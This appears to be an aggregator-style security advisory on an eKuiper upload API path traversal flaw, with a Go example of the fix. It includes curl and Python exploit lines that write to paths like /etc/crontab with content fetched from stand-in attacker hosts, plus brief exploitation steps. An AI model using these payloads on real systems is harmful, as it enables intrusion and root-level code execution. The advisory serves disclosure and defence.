The CVE-2024-1234 vulnerability in eKuiper’s `/config/uploads` API allows arbitrary file writes due to insufficient path traversal sanitization. The API accepts a JSON payload containing a `name` parameter, which is directly concatenated with the upload directory without proper validation. By injecting `../` sequences, an attacker can write files outside the intended directory. If eKuiper runs with root privileges, this can lead to Remote Code Execution (RCE) by overwriting critical files like `/etc/crontab` or SSH authorized keys.
The vulnerability stems from the `fileUploadHandler` function, which fails to sanitize the `fc.Name` parameter before joining it with `uploadDir`. A malicious payload such as `"name": "../../../../tmp/success"` therefore allows writing to arbitrary locations. Additionally, the API fetches the `file` URL server-side (SSRF), so the content written to that location can be pulled from a host the attacker controls, enabling attackers to plant malicious scripts.
DailyCVE Form:
Platform: eKuiper
Version: 1.14.1, 1.14.3
Vulnerability: Path Traversal → RCE
Severity: Critical
Date: 2024-03-15
Prediction: Patch by 2024-04-10
What Undercode Say:
Analytics:
```bash
curl -X POST http://localhost:9081/config/uploads -H "Content-Type: application/json" -d '{"name":"../../../../tmp/exploit","file":"http://attacker.com/malicious"}'
```

```python
import requests

payload = {"name": "../../etc/crontab", "file": "http://evil.com/backdoor"}
requests.post("http://target:9081/config/uploads", json=payload)
```
How to Exploit:
- Craft malicious JSON with path traversal in `name`.
- Host payload on a remote server.
- Trigger file write via SSRF.
Protection from this CVE:
- Sanitize `fc.Name` input.
- Restrict uploads to safe directories.
- Run eKuiper as non-root.
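The first two mitigations above, shown side by side in Go (eKuiper's language). This is an added example, not eKuiper's code or its patch: `uploadDir`, `vulnerableUploadPath` and `safeUploadPath` are names assumed for illustration. The vulnerable form reproduces the weakness described above (the name is joined to the upload directory and never checked); the hardened form accepts only a bare file name and then verifies that the resolved path still lies inside the upload directory.

```go
package main

import (
	"errors"
	"fmt"
	"path/filepath"
	"strings"
)

// uploadDir is a constructed value standing in for the server's upload directory.
const uploadDir = "/var/lib/ekuiper/uploads"

// ErrPathTraversal is returned when a name would resolve outside uploadDir.
var ErrPathTraversal = errors.New("upload name escapes upload directory")

// vulnerableUploadPath mirrors the weakness described above: the client-supplied
// name is joined with the upload directory and never validated, so "../"
// components walk out of it (filepath.Join cleans them into a real parent path).
func vulnerableUploadPath(name string) string {
	return filepath.Join(uploadDir, name)
}

// safeUploadPath is the hardened form (assumed name, added for this example).
// 1. Reject empty names and any name carrying directory components.
// 2. Join the bare base name to uploadDir.
// 3. Defense in depth: confirm the joined path is still relative to uploadDir
//    without a leading "..".
func safeUploadPath(name string) (string, error) {
	if name == "" {
		return "", errors.New("empty upload name")
	}
	base := filepath.Base(name)
	if base != name || base == "." || base == ".." || strings.ContainsAny(name, `/\`) {
		return "", ErrPathTraversal
	}
	full := filepath.Join(uploadDir, base)
	rel, err := filepath.Rel(uploadDir, full)
	if err != nil || rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
		return "", ErrPathTraversal
	}
	return full, nil
}

func main() {
	// The traversal strings are the ones quoted in the advisory above.
	for _, n := range []string{"report.csv", "../../../../tmp/success", "../../etc/crontab"} {
		fmt.Printf("%-28q vulnerable -> %s\n", n, vulnerableUploadPath(n))
		if p, err := safeUploadPath(n); err != nil {
			fmt.Printf("%-28q safe       -> rejected (%v)\n", n, err)
		} else {
			fmt.Printf("%-28q safe       -> %s\n", n, p)
		}
	}
}
```

The base-name check alone stops this CVE's payloads; the `filepath.Rel` check is kept because it also catches cases where a later refactor starts passing partially cleaned paths into the join.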
Impact:
- Arbitrary file write.
- Root-level RCE.
- SSRF exploitation.
Sources:
Reported By: github.com
Extra Source Hub:
Undercode